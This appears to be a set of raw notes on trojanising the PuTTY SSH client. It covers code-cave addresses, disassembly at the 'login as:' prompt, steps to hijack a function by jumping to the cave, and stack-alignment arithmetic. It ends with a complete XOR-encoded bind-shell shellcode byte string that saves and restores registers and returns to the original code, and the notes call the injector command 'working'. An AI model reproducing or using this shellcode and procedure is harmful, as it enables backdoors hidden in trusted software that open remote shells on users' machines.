0x0041CA9B


 add esp,0x1fc = \x81\xc4\xfc\x01\x00\x00
0x0012AC5C-0x0012AA60
0x0047AA10

0x0047a9e1

cave_miner inject shellcode.bin putty.exe 0x0007AA10 << working injector

0041CA9B  |. 68 7C7C4600    PUSH putty.00467C7C                      ;  ASCII "login as: "
0041CAA0  |. 8941 04        MOV DWORD PTR DS:[ECX+4],EAX
0041CAA3  |. E8 3FF6FEFF    CALL putty.0040C0E7

XOR Encoded bind shell

shellcode = ""



address:     0x0047a9e1

Size: 559 bytes

Codecave might change when putty is running
Find instruction that do not change when putty is running

For putty it is 0047AA10

To hijack function, change opcode to 'jump to codecave'

CodeCave should have:
PUSHAD
PUSHFD
#shellcode#
Stack alignment
POPFD
POPAD


Stack alignment:
Get ESP before shellcode is executed
Get new value of ESP after shellcode is executed
OLD ESP - NEW ESP = CHANGE
ADD ESP, CHANGE
POPFD
POPAD
(LAST INSTRUCTIONS)


ESP= 0012AC5C
ESP= 0012AA58

Add ESP, 0X204

ESP=0047AA95000041cA9B

 add esp,0x204 = \x81\xc4\x04\x02\x00\x00


 E9381FFAFF

\x60\x9C\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb2\x7b\xeb\x1f\x5e\x8d\x3e\x8a\x1c\x0f\x88\xdf\x88\xd0\x30\xd8\x74\x16\x66\x8b\x44\x0f\x01\x66\x31\xd8\x66\x89\x07\x41\x8d\x7f\x02\xeb\xe4\xe8\xdc\xff\xff\xff\xbf\x8e\x76\x7d\x19\xf6\x15\x64\x25\x74\xff\x02\x51\x5d\xda\x70\x06\x6c\x0d\x86\x63\x86\x8e\x0d\x74\x0a\x54\x13\x98\x25\xf9\xc1\xb6\x34\x2c\x41\x4a\xb9\x1b\xd5\xbd\xe7\x37\x68\x04\x86\xb4\xee\x95\xf3\xc3\x12\x65\x61\xc9\xa1\x7e\x5d\xd2\x54\x24\xbc\xad\xac\x4a\x19\xf5\xf6\xdc\x90\x5c\xb9\xc0\x0c\x49\x67\x80\xb1\x71\x82\xdb\xb4\xf5\xe5\x13\x52\x42\x98\xcf\xc9\xdd\x5e\x32\x64\x48\xc0\x3d\x72\xb6\xff\xa2\xc3\x51\xda\x0d\xda\xc7\xa2\x72\x73\x99\x22\xa9\x69\x77\x57\x76\xec\x05\xba\xa5\x94\x77\x8e\xcc\x05\x97\xa3\x06\x9f\x9e\x71\x24\x90\x12\x70\xdc\x44\xe2\x93\xca\xe5\x21\xd9\xf0\x81\x85\x4e\xb9\x74\xc5\xe2\xb0\x40\xab\x1e\x48\xc3\x03\x8f\xab\x8e\x90\x79\x9f\xf8\x4f\xec\x52\x03\xd9\xa5\xee\xb9\x52\x53\xbb\xbb\x32\x53\x99\x9a\x9d\x06\x97\xad\xed\x6d\xd3\x2e\x27\x5b\xcd\xc5\x40\x70\x2e\x74\xb5\xe6\x4a\x53\x83\x04\xa5\x30\x25\x68\x56\x1b\xc7\xb2\x76\x29\x77\x84\x3b\xc4\xeb\xf5\x58\x0a\x10\xc0\x85\x0f\x8e\x20\xb1\x4f\x4e\xc4\x2a\x67\x43\x29\x53\xba\xed\x17\x80\xd5\x7f\x71\xa1\xf4\xa9\x69\xdd\x0a\xf2\x3b\xb9\x6b\xeb\xd2\xba\xb1\x7a\x17\x1e\x52\x72\xdf\xf2\x8e\xd6\xc9\xf1\x62\xc9\x62\x62\x49\x8f\x0e\x2e\xc7\x2f\x6f\x3b\xe8\xe1\xdd\xc5\x4a\x1d\x18\xf5\xa7\xa7\x38\xfe\x7f\xb4\x5b\xbc\xe8\xbf\xba\xb3\xe1\xe4\x6a\x38\x95\x45\x13\xa1\xfa\x71\xbc\xbf\x43\x54\x82\x4f\x82\x7b\x81\xc4\x04\x02\x00\x00\x9D\x61\x68\x7C\x7C\x46\x00\xE9\x38\x1F\xFA\xFF